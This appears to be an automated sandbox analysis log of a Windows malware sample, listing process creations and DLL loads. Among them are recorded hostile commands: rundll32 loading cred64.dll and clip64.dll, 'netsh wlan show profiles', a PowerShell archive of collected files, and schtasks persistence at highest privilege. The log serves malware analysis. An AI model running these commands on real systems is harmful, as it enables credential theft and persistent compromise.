Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe "C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5564 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3896 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3476 --field-trial-handle=1908,i,11369697979599954763,617967172269754470,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,11986883696083450326,11027901686881542534,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4752 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 --field-trial-handle=2028,i,1801343791717140739,10780303537673974787,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: explorerframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Section loaded: userenv.dll
